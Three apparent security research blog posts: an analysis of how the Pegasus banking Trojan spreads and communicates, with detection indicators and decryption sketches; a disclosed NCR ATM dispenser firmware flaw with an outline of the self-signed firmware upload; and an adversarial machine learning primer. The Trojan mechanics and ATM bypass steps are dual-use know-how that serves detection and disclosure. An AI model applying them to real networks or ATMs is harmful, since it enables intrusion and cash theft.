
Pegasus: analysis of network behavior

Source code for Pegasus, a banking Trojan, was recently published online. Although the archive name referenced the Carbanak cybercrime gang, researchers at Minerva Labs have shown that Pegasus is actually the handiwork of a different group known as Buhtrap (Ratopak). The archive contains an overview of the Trojan, its source code, a description of Russian banking procedures, and information on employees at a number of Russian banks.

The architecture of the Pegasus source code is rather interesting. Functionality is split among multiple modules, which are combined into a single binpack at compile time. During compilation, executables are signed with a certificate from the file tric.pfx, which is missing from the archive.

The network behavior of Pegasus is no less curious. After infection, Pegasus tries to spread within the domain and can act as a proxy to move data among systems, with the help of pipes and Mailslot transport. We focused on the unique aspects of the malware's network behavior and quickly added detection signatures to PT Network Attack Discovery. Thanks to this, all users of PT NAD can quickly detect this Trojan and its modifications on their own networks. In this article, I will describe how Pegasus spreads on a network and how copies of Pegasus communicate with each other.

Basic structure

Once on a victim computer, the initial module (InstallerExe) uses process hollowing to inject code into svchost.exe. After the main modules initialize, Pegasus launches several parallel processes:

  1. Domain Replication: Gathers information about the network and tries to spread Pegasus to other Windows systems.
  2. Mailslot Listener: Listens for Mailslot broadcasts, which are used by Pegasus to send stolen credentials. The slot name is generated at compile time.
  3. Pipe Server Listener: Listens to the Windows Pipe with a name derived from the name of the computer. These pipes are used mainly to discover and communicate with other copies of Pegasus on the same network.
  4. Logon Passwords: Tries once every few minutes to dump credentials from memory with the help of a Mimikatz-based module.
  5. Network Connectivity: Responsible for interfacing with the C&C server and periodically exchanging messages.
// start transports which links data with our CB-manager
pwInitPipeServerAsync(dcmGetServerCallback());
mwInitMailslotServer(dcmGetServerCallback());
...
// start broadcasting creds to other machines
cmStartupNetworkBroadcaster();

Domain Replication

This module is responsible for lateral movement on Windows networks. Movement consists of two steps:

  1. Discovering other machines on the domain.
  2. Trying to replicate Pegasus to those machines.


Discovery of other machines on the domain relies on two API mechanisms: NetServerEnum, which requires the Browser service to be running, and WNetOpenEnum/WNetEnumResource. Every machine discovered on the domain is checked to see whether it is already infected: Pegasus polls the generated pipe name more than 20 consecutive times, once every 200 milliseconds. (We flagged this strange polling pattern as one of the indicators of a Pegasus infection.) If Pegasus does not detect any signs of infection, it proceeds to the next step: replication.
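
That polling behavior is easy to express in code. The sketch below is our reconstruction for illustration (Windows-only; the pipe name stands in for the generated one), not the Trojan's own routine:

import ctypes
import time

GENERIC_READ = 0x80000000
OPEN_EXISTING = 3

def pipe_answers(host, pipe_name, attempts=20, delay=0.2):
    """Return True if \\\\host\\pipe\\pipe_name can be opened (host infected)."""
    kernel32 = ctypes.windll.kernel32
    path = "\\\\%s\\pipe\\%s" % (host, pipe_name)
    for _ in range(attempts):
        handle = kernel32.CreateFileW(path, GENERIC_READ, 0, None,
                                      OPEN_EXISTING, 0, None)
        if handle != -1:              # INVALID_HANDLE_VALUE
            kernel32.CloseHandle(handle)
            return True
        time.sleep(delay)             # 200 ms between polls
    return False

A burst of rapid-fire opens of the same pipe name from one host is exactly the anomaly our network signatures look for.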

With the help of credentials found on the host, Pegasus tries to log in to the target over the SMB protocol to IPC$ and ADMIN$ shares. If IPC$ is accessible but ADMIN$ is not, Pegasus concludes that the account does not have sufficient rights and marks the credentials as invalid. After obtaining access to the ADMIN$ share, which is an alias for the %windir% folder, the malware tries to determine the machine architecture in order to pick the suitable module to apply.

This process of architecture determination is based on the headers of PE files on the machine in question: Pegasus attempts to read the first 4 kilobytes of notepad.exe in the %windir% folder. One subtle drawback of this method is that on Windows Server 2012, notepad.exe is found only under %windir%\System32, not in %windir% itself.

Location of notepad.exe on Windows 7:

C:\Users\Administrator>where notepad.exe
C:\Windows\System32\notepad.exe
C:\Windows\notepad.exe

Location of notepad.exe on Windows Server 2012:

C:\Users\Administrator>where notepad.exe
C:\Windows\System32\notepad.exe

If notepad.exe is not found, Pegasus cannot infect the server, even if it has credentials for an account with the necessary rights. So the simple absence of Notepad in %windir% can stop Pegasus from spreading on Windows Server 2012. Using regedit.exe would have been a more surefire way of accomplishing this task.
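
The header check itself is simple enough to sketch. The following reads the Machine field of a PE header, the field Pegasus inspects in the first 4 KB of notepad.exe (constants come from the PE format specification; the UNC path in the example is illustrative):

import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664

def pe_architecture(path):
    """Read the Machine field from a PE header (the first 4 KB are enough)."""
    with open(path, "rb") as f:
        data = f.read(4096)
    if data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]   # offset of "PE\0\0"
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    return {IMAGE_FILE_MACHINE_I386: "x86",
            IMAGE_FILE_MACHINE_AMD64: "x64"}.get(machine)

# e.g. pe_architecture(r"\\target\ADMIN$\notepad.exe") -> "x86" or "x64"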

After determining the architecture of the target server, Pegasus uploads a small (~10 kilobyte) Remote Service Exe (RSE) dropper to it. The dropper's purpose is to receive binpack, which contains the payload modules, via a pipe in cleartext and hand off control to the Shellcode module. The name of the dropper is generated pseudorandomly and consists of 8 to 15 hexadecimal characters. The pseudorandom generator uses the name of the target machine as a seed, ensuring that the name is identical across restarts so as to avoid littering %windir% with multiple copies.
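
The exact generator is in the source archive; a toy stand-in makes the property clear. The sketch below (illustrative, not the Pegasus algorithm) derives an 8-to-15-character hex name deterministically from the machine name, so every run against the same target yields the same file name:

import hashlib

def dropper_name(machine_name):
    """Toy stand-in for the Pegasus name generator: same input, same name."""
    digest = hashlib.sha1(machine_name.lower().encode("utf-16-le")).hexdigest()
    length = 8 + int(digest[0], 16) % 8          # 8..15 characters
    return digest[1:1 + length]

print(dropper_name("WS-ACCOUNTING-07"))   # stable across runs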


After checking the dropper's integrity and making sure that it has not been deleted by antivirus protection, Pegasus attempts to run the dropper via the Windows Management Instrumentation (WMI) mechanism. Service Control Manager (SCM) can also be used, but the malware prefers the former because SCM leaves more traces in Windows logs. The code suggests that the creators of Pegasus planned to implement other replication methods as well: WSH Remote, PowerShell Remoting, and Task Scheduler. A module for running commands via RDP was under development, too.

As mentioned already, once launched, the dropper checks its pipe and starts listening on it, handing off control to the payload that arrives.


Since Pegasus code is injected via process hollowing into the svchost.exe process, the victim disk will not retain any copy of the initial module InstallerExe (if infection started with the machine in question) or of the RSE dropper (in the case of replication). If the dropper is still accessible at a known path, Pegasus deletes it as follows:

  1. Overwrites the file contents with random data.
  2. Overwrites the file again, this time with empty data (zeroes).
  3. Renames the file.
  4. Deletes the file.
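
The same four-step wipe is easy to sketch in Python (the rename target is illustrative):

import os

def wipe(path):
    size = os.path.getsize(path)
    with open(path, "r+b") as f:          # 1. overwrite with random data
        f.write(os.urandom(size))
        f.flush(); os.fsync(f.fileno())
    with open(path, "r+b") as f:          # 2. overwrite with zeroes
        f.write(b"\x00" * size)
        f.flush(); os.fsync(f.fileno())
    new_path = path + ".tmp"              # 3. rename the file
    os.rename(path, new_path)
    os.remove(new_path)                   # 4. delete the file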

If infection is successful, Domain Replication begins again.

Mailslot

When Pegasus obtains credentials from another copy of Pegasus or from the mod_LogonPasswords module, the malware starts broadcasting the credentials on the domain. Broadcasting is performed using the Mailslot mechanism, which is based on SMB and allows sending one-way broadcasts of small portions of data to systems on the domain. The slot names look random but are generated deterministically: so that all infected machines on the domain send and receive with the same slot name, the pseudorandom name generator is seeded from the variable TARGET_BUILDCHAIN_HASH, which is set in the configuration at build time.

Since Mailslot imposes an upper limit on packet size, only one set of credentials is broadcast at a time: of all available domain credentials, the set whose last broadcast is the oldest (that is, every other set has been broadcast more recently) is chosen.

Mailslot data is not sent in cleartext; it is wrapped in three layers of XOR encryption, with the keys transmitted together with the data. The first layer is a NetMessageEnvelope with an SHA1 integrity check, used for all data sent on the local network; its key is contained in the first 4 bytes of the packet and shifts 5 bits to the right on each cycle. Inside is an XOR-encrypted structure with fields for the credentials and the date they were added; it begins with an 8-byte key, applied without shifting. After decoding that structure, all that remains is to deserialize the individual fields (computer name, domain name, username, and password) from ENC_BUFFER structures. These fields are encrypted with an 8-byte key with shifts. A sample Mailslot packet and a script for decrypting it are available: script, PCAP.
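
The first layer is easy to illustrate. Below is a minimal sketch of the envelope decryption as we understand it, assuming the 5-bit shift is a rotation: the 4-byte key at the head of the packet is XORed over the data dword by dword and rotated after each step. (The published script linked above is the authoritative version and handles the remaining layers and the SHA1 check.)

import struct

def ror32(value, bits):
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF

def decrypt_envelope(packet):
    """Strip the outer XOR layer of a NetMessageEnvelope (sketch)."""
    key = struct.unpack_from("<I", packet, 0)[0]   # key travels with the data
    out = bytearray()
    for offset in range(4, len(packet) - len(packet) % 4, 4):
        word = struct.unpack_from("<I", packet, offset)[0]
        out += struct.pack("<I", word ^ key)
        key = ror32(key, 5)           # key shifts 5 bits on each cycle
    return bytes(out)                 # trailing odd bytes ignored in this sketch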

In the release version of the malware, Mailslot messages are sent at an interval between 20 seconds and 11 minutes.

// some random wait before making next step
DbgPrint("going to sleep");
#ifdef _DEBUG
// debug - 2-5 s
Sleep(rg.rgGetRnd(&rg, 2000, 5000));
#else
// release - 20 - 650 s
//Sleep(rg.rgGetRnd(&rg, 2000, 65000) * 10);
Sleep(rg.rgGetRnd(&rg, 2000, 15000));
#endif

Besides providing credentials, Mailslot messages also announce Internet access and help to find other infected computers that have such access. NetMessageEnvelope indicates the type of message inside. Pipes make it possible for Internet-connected computers to communicate with computers that are not connected to the Internet.

Pipes

Pegasus uses pipes for two-way communication and sending large amounts of data. Although the name of each pipe is generated by a pseudorandom generator, it also depends on the machine name and build, which allows the Pegasus client and server to use the same name.

During one-way communication (such as when sending binpack during replication to another computer), data is sent unencrypted. At the beginning of binpack is the structure SHELLCODE_CONTEXT, which is 561 bytes long.


Two-way communication (say, when proxying data between a Pegasus copy with Internet access and a C&C server) makes use of the same NetMessageEnvelope structure with XOR encryption that we already saw with Mailslot. This works because the structure allows differentiating message types based on the id field.

When data is being proxied, a query for data is sent (PMI_SEND_QUERY), the query ID is received, and the status of the query can be checked by its ID (PMI_CHECK_STATUS_QUERY). In most cases, the payload will be yet another Envelope structure, which adds features and another layer of encryption.

These pipes can do more than just help infected machines to communicate. The module mod_KBRI_hd injects cmd.exe processes with code that intercepts MoveFileExW calls and analyzes all copied data, since this is a part of the bank payment mechanism. If the copied file contains payment data of interest to the attackers, a notification is sent to the C&C server. The mod_KBRI module, injected into cmd.exe, communicates with Pegasus on an infected machine via a pipe whose name is not generated, but rather hard-coded:

\\.\pipe\pg0F9EC0DB75F67E1DBEFB3AFA2

Module functionality also includes the ability to replace payment information on the fly using a template. Example search patterns are shown in the screenshot.


C&C traffic

Data exchange with the C&C server is handled by a separate stream that, every few minutes, checks the queue of data chunks from internal processes or other copies of Pegasus and sends them to the server.

During initialization of the mod_NetworkConnectivity module, the presence of a network connection is tested in several steps:

1) Detection of proxy server settings and attempt to connect to www.google.com:

  • In the Registry branch Software\Microsoft\Windows\CurrentVersion\Internet Settings
  • Via WPAD (WinHttpGetProxyForUrl call)
  • Via the proxy server configuration for the current user (WinHttpGetIEProxyConfigForCurrentUser call)

2) Verification of the connection with Microsoft update servers and of the data returned by them (authrootseq.txt, authrootstl.cab, rootsupd.exe)

3) Testing of HTTPS connections with one of the following addresses:

  • https://safebrowsing.google.com
  • https://aus3.mozilla.org
  • https://addons.mozilla.org
  • https://fhr.data.mozilla.com
  • https://versioncheck-bg.addons.mozilla.org
  • https://services.addons.mozilla.org

Only if all these checks are passed does Pegasus consider an external network to be accessible, after which it announces this fact on the domain via a Mailslot message. For stealth, Pegasus communicates with the C&C server only during working hours (9:00 a.m. to 7:00 p.m. local time).

Data chunks, wrapped in an envelope with a checksum, are sent with DES encryption in CRYPT_MODE_CBC/PKCS5_PADDING mode. The encryption key is derived entirely from a variable set at compile time, meaning that we can decrypt traffic between Pegasus and the C&C server as long as we know the value of BUILDCHAIN_HASH. In the source code in the archive in question, this variable equaled 0x7393c9a643eb4a76. A sample packet and a script for decrypting the server check-in are available for download: GitHub, PCAP.
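
With the key known, decryption is routine. Here is a sketch using PyCryptodome, assuming the 8-byte DES key and IV have already been derived from BUILDCHAIN_HASH (the exact derivation is in the published script; the parameters below are placeholders):

from Crypto.Cipher import DES  # pip install pycryptodome

def decrypt_chunk(ciphertext, key, iv):
    """DES-CBC with PKCS5 padding, as used for Pegasus C&C traffic."""
    plaintext = DES.new(key, DES.MODE_CBC, iv).decrypt(ciphertext)
    pad = plaintext[-1]                     # strip the PKCS5 padding
    return plaintext[:-pad]

# key and iv are 8-byte values derived from BUILDCHAIN_HASH
# (0x7393c9a643eb4a76 in the leaked source); see the GitHub script.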

This content (in the INNER_ENVELOPE structure) is sent to the C&C server during check-in or together with other data. It begins with a 28-byte envelope containing a length field and an SHA1 checksum.


When proxied via pipes between machines, the same data is sent, but wrapped in the NetMessageEnvelope we have already discussed, plus the checksum and XOR encryption.

The C&C operator can send execution commands to Pegasus copies. Messages with commands or other data, such as EID_CREDENTIALS_LIST, can contain their own layers of encryption for fields, as we already saw with broadcasting of stolen credentials.

Detection

We focused on how to detect Pegasus activity on the network. After carefully studying the source code and running the malware in a test environment, we were able to compile a list of network anomalies and artifacts that clearly indicate the presence of this sophisticated threat.

It would be fair to call Pegasus versatile: it actively uses the SMB protocol to send messages and communicate with other copies. The methods used for replication and C&C interaction are also distinct. Pegasus copies establish a peer-to-peer network on the domain, building a path to the Internet and communicating with C&C servers by means of traffic proxying. Certificate signing of executables and use of Microsoft and Mozilla sites for verifying connection access complicate attempts to detect Pegasus activity and discover infected hosts.

The Pegasus source code is relatively well structured and commented, making it likely that other threat actors will copy or "borrow" code for their own malware.

Many of the mechanisms for remotely running commands and searching for credentials remain unimplemented. Among the developers' unrealized plans was the ability to modify shellcode on the fly during process injection.

We have developed several signatures for PT NAD and the Suricata IDS suitable for detecting Pegasus-specific activity at various stages, within the very first seconds of presence. Public signatures for Suricata are available from our company on GitHub and Twitter, and will automatically be added to Suricata if you use the suricata-update mechanism.

You can view detections with Pegasus signatures in the following screenshot. This view is taken from PT Network Attack Discovery, our product for incident detection and forensic investigation:


In addition, here are some useful indicators of compromise (IoC):

MAILSLOT\46CA075C165CBB2786 
pipe\pg0F9EC0DB75F67E1DBEFB3AFA2

hxxp://denwer/pegasus/index.php
hxxp://mp3.ucrazy.org/music/index.php
hxxp://support.zakon-auto.net/tuning/index.asp
hxxp://video.tnt-online.info/tnt-comedy-tv/stream.php

Author: Kirill Shipulin, @attackdetection team, Twitter | Telegram


Low-level Hacking NCR ATM



Many of the systems that power the modern world are supposed to be beyond the reach of mere mortals. Developers naively assume that these systems will never give up their secrets to attackers and eagle-eyed researchers.

ATMs are a perfect case in point. Thefts using malware such as Cutlet Maker, as well as unpublicized incidents in which unknown attackers plugged a laptop into an ATM and stole cash without leaving any trace in system logs, confirm what the security community has long known: there is no such thing as a hack-proof system, merely one that has not been sufficiently tested.

Getting started

Even now, many people think that the only way to rob an ATM involves the brutest of brute force: pulling up in a pickup, attaching a hook, and pushing hard on the gas pedal, before savaging the ATM with a circular saw, crowbar, and welding kit.

But there is another way.

After a brief search on eBay, I obtained the board of an NCR USB S1 dispenser, complete with firmware. I had two objectives:

  • Bypass the encryption used for commands (such as "dispense banknotes") that are sent by the ATM computer via USB to the dispenser.
  • Bypass the requirement for physical access to the safe in order to complete authentication (which must be performed by toggling the bottom cassette in the safe), which is needed for generating the encryption keys for the commands mentioned above.


Firmware

The firmware is an ELF file for the NXP ColdFire processor (the Motorola 68040, my favorite CPU!) running on VxWorks v5.5.1.


There are two main sections of interest in the ELF file, .text and .data:

  • The first contains code that loops continuously most of the time (we'll call it the "main firmware") when the dispenser is connected to the system in the upper part of the ATM.
  • The second contains a zlib-compressed bootloader (locally named "USB Secure Bootloader"), which is responsible for uploading firmware and running the main code.

And best of all (for researchers, anyway), the debug symbols in the ELF file were all present and easily searchable.

Inner workings of the main firmware

We can divide the code into four main levels, from top to bottom in the hierarchy:

  1. USB Receive Thread, which accepts USB packets and distributes them to the different services.
  2. Services are the main units of execution. Each service has a particular role and corresponding tasks (classes).
  3. Classes, here, are tasks that can be performed by a particular service using controllers.
  4. Controllers are the workers that validate tasks, perform tasks, and generate result packets.


There was a lot of firmware code, so I decided to start by finding all possible services and only then trying to figure out where tasks are transferred.

Here are the services I found that were responsible for the actions of interest:

1) DispTranService (Dispenser Transaction Service): Handles encrypted commands, forms bundles of banknotes, performs authentication, and much more. All the interesting stuff, in other words.


2) securityService: After authentication, a session key is generated on the dispenser. When requested by the ATM computer, the session key is sent to it in encrypted form. This key is then used to encrypt all commands the vendor designates as important, such as dispensing cash and forming bundles of banknotes.


But then another service, UsbDownloadService, caught my eye. When the dispenser is connected to the computer and the firmware version on the dispenser doesn't match the version expected by the computer, this service switches to the bootloader in order to upload the firmware needed to work with the OS (stored in the folder with the vendor's software on the computer). This service can also give us information about the current firmware version.


Physical authentication

Physical authentication is in fact implemented extremely well, with the mission of protecting the ATM from unauthorized USB commands. The ATM safe with cash must be open in order to perform either of the following actions:

  • Remove and insert the lower cassette.
  • Toggle the switch on the dispenser main board.


But all this is required only if the access level is set to the maximum. There are three access levels in total: USB (0), logical (1), and physical (2). The first two are used by firmware developers for debugging and testing. The vendor, of course, strongly urges selecting the third one by default.

The vulnerability

Here I will describe a critical vulnerability (since fixed by the vendor) that allowed the dispenser to be forced to execute any command, even "give me cash now!", given physical access to the service zone of the ATM but not to the safe zone (for example, through a hole drilled in the ATM front panel).


I found that UsbDownloadService accepts commands that don't require encryption. That sounds tempting, but shouldn't Secure Bootloader prevent any further mischief, as its name implies?

Spoiler: …it doesn't!

We need to go deeper 

As mentioned already, the .data section contains compressed bootloader code that didn't initially catch my attention or that of my colleagues.


As long as the bootloader remained a secret, there was no way to answer the question: "How does the software on the computer upload the dispenser’s firmware?" The main firmware did not reveal any clues.


So the bootloader was unpacked and loaded into IDA at offset 0x100000, where the investigation could start… except there were no debug symbols there!

But after comparing the main firmware with the bootloader code and reading the controller datasheet, I started to get a better idea of what was happening.


Although the process of firmware uploading seemed to be secure, in reality it was not. The trick was just to upload the firmware in the right way :)

Fully understanding this process took a lot of time and dedication (details can be learned from "Blackbox is dead – Long live Blackbox!" at Black Hat USA 2018 in Las Vegas). These efforts included re-soldering NVRAM and copying the backup to it in order to unbrick the controller… and other easy-peasy stuff like that.

Thank you to my colleague Alexey for his patience!

Here is the method for uploading firmware to the dispenser:

1) Generate an RSA key pair and upload the public key to the controller.


2) Write .data and .text from the ELF in sequence to their physical addresses, taken from the section headers:


3) Calculate the SHA-1 checksum for the newly written data, encrypt that value with the private key, and send the result to the controller.


4) Calculate and send the sum of all firmware words that have been written.


At which point, if everything has been calculated and written correctly, the main firmware will boot without a hitch.
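
For concreteness, here is a sketch of steps 3 and 4 on the host side, using Python's cryptography library. The framing and the word size are simplifications on my part; the essential point is that the controller verifies the firmware against a key pair that the attacker has just uploaded.

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

# step 1: the attacker's own key pair; the controller accepts any public key
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()   # this is what gets uploaded

def firmware_signature(firmware: bytes) -> bytes:
    """Step 3: SHA-1 over the written data, encrypted with the private key."""
    return private_key.sign(firmware, padding.PKCS1v15(), hashes.SHA1())

def firmware_word_sum(firmware: bytes) -> int:
    """Step 4: sum of all firmware words (16-bit words are my assumption)."""
    return sum(int.from_bytes(firmware[i:i + 2], "big")
               for i in range(0, len(firmware), 2)) & 0xFFFF

Since nothing ties the uploaded public key to the vendor, whoever controls the USB link can "sign" arbitrary firmware, which is precisely the vulnerability.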

Only one restriction was found in the firmware writing process: the version of the "new" firmware cannot be lower than the version of the current firmware. But nothing stops you from tinkering with the firmware version number in the data that you write yourself.

So my special firmware with anti-security "secret sauce" was uploaded and run successfully!

By now I had a good knowledge of the main firmware, commands used to dispense cash, and more. All that remained was to send (unencrypted) commands, which the dispenser would eagerly obey.


Cash dispensing

This successful result was a worthy intellectual (although not monetary) reward for all the travails of research, such as bricking a real ATM (oops!). My curiosity almost inspired me to try repeating this trick with another major ATM vendor.


Ultimately, a very real ATM began to whirr and spit out very not-real dummy bills (vendors' shiny equivalent of Hollywood prop money). No magic was necessary: just a laptop, brainpower, and a USB cord.

Conclusions

"Security through obscurity" is no security at all. Merely keeping code or firmware proprietary will not stop an attacker from finding a way in and taking advantage of vulnerabilities. Curiosity and an initial financial outlay are all that is required.

Just as development is best handled by developers, security should be the job of security professionals. The most productive approach for vendors is to work closely with dedicated security companies, which have teams possessing the necessary experience and qualifications to assess flaws and ensure a proper level of protection on a case-by-case basis.

Postscriptum

The vendor has confirmed the vulnerability (which was also found in the S2 model) and declared it fixed as of the February 2018 patch.

CVE listings:

  • CVE-2017-17668 (NCR S1 Dispenser)
  • CVE-2018-5717 (NCR S2 Dispenser)

Acknowledgements

Before I had even set to work on the firmware, Dmitry Sklyarov and Mikhail Tsvetkov had already discovered a lot about it (even without having a dispenser board). Their findings were of enormous assistance! And as concerns everything hardware-related, Alexey Stennikov's help was absolutely invaluable.

Author: Vladimir Kononovich, Positive Technologies

Machine learning: good for security or a new threat?

Machine learning is no novelty anymore. On the contrary: every self-respecting startup feels compelled to apply machine learning in its offerings. The hunt for scarce developers has been superseded by a scramble for machine learning experts. Fortunately, many machine learning tasks are similar enough that it is possible to save time and money by using pre-trained models. Open-source models are also available free of charge. But does this all really work as well as it seems?

Machine learning methods are methods of creating algorithms that can learn and act without being explicitly programmed, using prearranged data. Data refers to anything that can be described by features or measured. If a feature is unknown for part of the data, we can apply machine learning methods to predict the values of that feature based on the data for which it is already known.

The figure below illustrates how any object is described by some features X, which can be measured, calculated, or discovered. There is also a target feature y, which can be unknown for some of the data. Using the data for which the target feature is known, we can train a model to predict the target feature for the remainder of the data.


Machine learning is used for solving several types of tasks, but this article will mostly consider the topic of classification.

The aim of the classifier model training stage is to find a correlation (function) that maps features of a specific object to one of the known classes. Cases that are more complicated require prediction of the class probability.

In essence, we have a set of input values X = {x1, …, xn}, a set of potential classes Y = {y1, …, ym}, and a loss function l. Our task is to find, based on available data D, a function f: X → Y that minimizes the loss function l. A quadratic loss function is the type most commonly used. The function space F can be any set of mappings from X to Y.


Thus, the task of classification is to create a hyperplane dividing the feature space (whose dimensionality generally equals the length of the feature vector) into parts so that objects of each class lie on different sides of the hyperplane.

The hyperplane for two-dimensional space is a line. Let us review a simple example:

The figure shows two classes: squares and triangles. It is impossible to separate them accurately with a linear function. Machine learning can approximate a non-linear function that divides these two sets in the best way.
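
As a toy illustration of this point, consider scikit-learn's two interleaved "moons" (hypothetical data): a linear model cannot separate them well, while a kernel method approximates the needed non-linear boundary:

from sklearn.datasets import make_moons
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC

# two interleaved classes that no straight line separates
X, y = make_moons(n_samples=500, noise=0.2, random_state=0)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)

linear = LogisticRegression().fit(X_train, y_train)
nonlinear = SVC(kernel="rbf").fit(X_train, y_train)

print("linear model:    ", linear.score(X_test, y_test))     # noticeably lower
print("non-linear model:", nonlinear.score(X_test, y_test))  # close to 1.0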

Classification is a task for supervised learning. Learning requires a set of data with distinguishable object features and classes.

Developers of such systems often face a critical question: who should tag these object classes? In some cases, historical data is available or object features can be measured, and sometimes there is an expert who can provide this information. But is this information always correct and objective?

Information security has been applying machine learning methods for quite some time now, in areas such as spam filtering, traffic analysis, and fraud and malware detection. It is a bit of a cat-and-mouse game, in which each side makes its move and waits for the opponent's response. And while playing this "game," you have to continuously retrain models on new data or replace them completely in light of the latest breakthroughs.

An illustration of this case is antivirus software, which makes use of signature analysis, heuristics, and manually created rules. Maintaining all this is rather time-consuming! Information security experts debate the usefulness of antivirus solutions; many consider it a dead product category. All these rules applied in antivirus products can be bypassed, for example with obfuscation and polymorphism. Therefore, we would likely prefer tools that use smarter techniques such as machine learning for automatic identification of features (even those uninterpretable by a human), quick processing and generalizing of large quantities of data, and fast decision-making.

So as we see, on the one hand, machine learning can be used for protection. On the other hand, it also makes attacks smarter and more dangerous.

Let's check if this tool is vulnerable


Any algorithm requires not only carefully selected hyperparameters, but also training data. Ideally, training data should be sufficient, with balanced classes and a brief training period—which is nearly impossible in real life.

By the quality of a trained model, we usually mean its accuracy in classifying data that the model "sees" for the first time. Broadly speaking, quality is the ratio of correctly classified data samples to the total amount of data provided to the model.

All quality assessments make implicit assumptions about the expected distribution of input data and do not take into account adversarial settings, which frequently go beyond the expected distribution of input data. Adversarial settings mean an environment in which it is possible to confront or interact with the system. Typical examples of such settings include environments that use spam filters, fraud detection algorithms, and malware analysis systems.

Thus accuracy can be seen as an average value of system performance in typical cases, while security assessment considers the worst performance cases.

Machine learning models are commonly tested in a more or less static environment, in which accuracy depends on the quantity of data for each specific class; but we cannot be sure that the same distribution will hold in reality. From the attacker's standpoint, however, we want the model to make mistakes, so the task is to find as many input vectors producing a misleading result as possible.

When we speak of the security of a system or service, we generally mean that it is impossible to breach a hardware or software security policy within the framework of our threat model, as verified during the development and test stages.

Unfortunately, a large number of services currently rely on data analysis algorithms, so risk can stem not from vulnerable functionality, but from the data a system uses to make decisions.

Change is all around us, and hackers too are constantly learning something new. To protect machine learning algorithms from attackers, who may abuse their knowledge of how a model operates to compromise the system, adversarial machine learning methods are used.

This concept of information security in machine learning gives rise to a number of questions, some of which we will discuss here.

Is it possible to manipulate a machine learning model to perform a targeted attack?


Here is a simple example with search engine optimization (SEO). People already study the way the smart algorithms of search engines work and manipulate websites to get a higher ranking in search results. Security of such systems is not a critical issue, as long as no data is compromised or significant damage is caused.

It is possible to attack services that are based on online learning: to train the model, data is provided in consecutive order to update current parameters. With knowledge of the system's learning process, an attacker can change the result by supplying suitably arranged data to the system.

Biometric systems, for example, can be fooled in this way. Their parameters are gradually updated based on slight changes in appearance, such as aging, which is absolutely natural and essential to take into account. But an impostor can benefit by feeding certain data to the biometric system that subtly influences the learning process until, eventually, the model learns to accept the impostor's appearance.

Can an impostor select valid data so that the data would always trigger a malfunction, degrading system performance to the point that the system must be disabled?


This issue is quite natural because machine learning models are tested in a static environment, and their quality is assessed based on the distribution of the data that has been used for learning. Nevertheless, data analysis experts face the following questions, which their models have to be able to answer:

  • Is the file malicious?
  • Is the transaction fraudulent?
  • Is the traffic legitimate?

Of course, an algorithm cannot be 100 percent accurate; it can only classify an object with some probability. Therefore, a compromise has to be found between type I and type II errors, the cases in which our algorithm cannot be completely sure of its choice and makes mistakes.

Let's review a sample system with very frequent type I and type II errors. An antivirus product has blocked your file, falsely considering it to be malicious, or has failed to protect you from a malicious file. In this case, a user considers the product to be useless and simply disables it, although the error may be due to the dataset.

And the thing is that there always exists a dataset that will yield the worst results for a given model. So all an attacker needs to do is find such data in order to make the user disable the service. Such situations are rather troublesome and should be avoided by the model. Imagine the work involved in investigating all false incidents!

Type I errors are considered a waste of time, while type II errors are a missed opportunity. But in fact, the cost of these two types of errors may be different for each system. For antivirus software, type I errors may be less costly: it is better to be overcautious and err on the side of calling a file malicious. After all, if the user has disabled the software and the file actually was malicious, the antivirus product still "did its job" and the responsibility lies with the user. If we are talking about a system for medical diagnostics, both mistakes are rather expensive: in either case, the patient is at risk of incorrect treatment and risk to health.

Can an attacker who wants to disrupt a system take advantage of the properties of a machine learning method, without interfering with the training process? In other words, could an attacker identify limitations in the model that invariably produce false predictions?


The process of assigning features in deep learning systems seems to be basically safe from human interference, so in this sense decision-making by the model is safe from the human factor. The great thing about deep learning is that you only need to feed raw input data to the model; by multiple linear transformations, the model itself extracts the features it considers the most important and makes a decision. But what are the limitations of this approach?

Research papers have described adversarial examples in deep learning: inputs deliberately crafted so that the system classifies them incorrectly. One of the best-known articles is "Robust Physical-World Attacks on Deep Learning Models."

Based on the restrictions of deep learning, the authors suggested a number of techniques for bypassing models that can deceive vision systems. As an example, they performed experiments with traffic sign recognition. To fool the system, it would be sufficient to identify the object areas that, when modified, confuse the classifier into making a mistake. The experiment was to modify a STOP sign so that it would be classified as SPEED LIMIT 45 by the model. The researchers also tested their approach on other traffic signs, with similarly successful results.
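
The idea underlying many such attacks is simple. Here is a minimal sketch of the classic fast gradient sign method (FGSM) applied to a plain logistic-regression model; this is the generic white-box technique, not the physical attack from the paper:

import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def fgsm(x, y, w, b, eps=0.1):
    """Shift x by eps in the direction that most increases the loss."""
    p = sigmoid(np.dot(w, x) + b)       # model's probability of class 1
    grad_x = (p - y) * w                # gradient of cross-entropy w.r.t. x
    return x + eps * np.sign(grad_x)    # the adversarial example

# A sample correctly classified as class 0 drifts toward class 1 after an
# almost invisible per-feature perturbation of +/- eps.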



In general, the article explains two ways of fooling a machine learning system: poster-printing attacks, which involve a number of small perturbations (camouflage) on the sign, and sticker attacks, with placement of stickers in specific areas.

These situations can easily occur in real life: a traffic sign is covered with dust or has undergone an artistic intervention. So it might seem that artificial intelligence and art are fated to exist apart.


Targeted attacks against automatic speech recognition systems have also lately become fodder for research. Voice messages are "cool" on social networks, but not always convenient to listen to; hence the creation of speech-to-text services. Researchers analyzed an original audio waveform and crafted a different waveform, 99 percent similar to the original with minor changes added, whose transcription yields whatever text the attacker selected. The figure below illustrates the attack: a slightly modified waveform causes the transcription to consist of a phrase chosen by the attacker.


What methods are there to prevent manipulation of machine learning models?


Currently it is easier to attack a machine learning model than to protect it from adversarial attacks. The reason is that no matter how long we train the model, there always exists a dataset that will be misclassified by the model.

Nobody has yet invented any ways to guarantee perfect accuracy by a model. However, there are several ways to make a model more robust to adversarial examples.

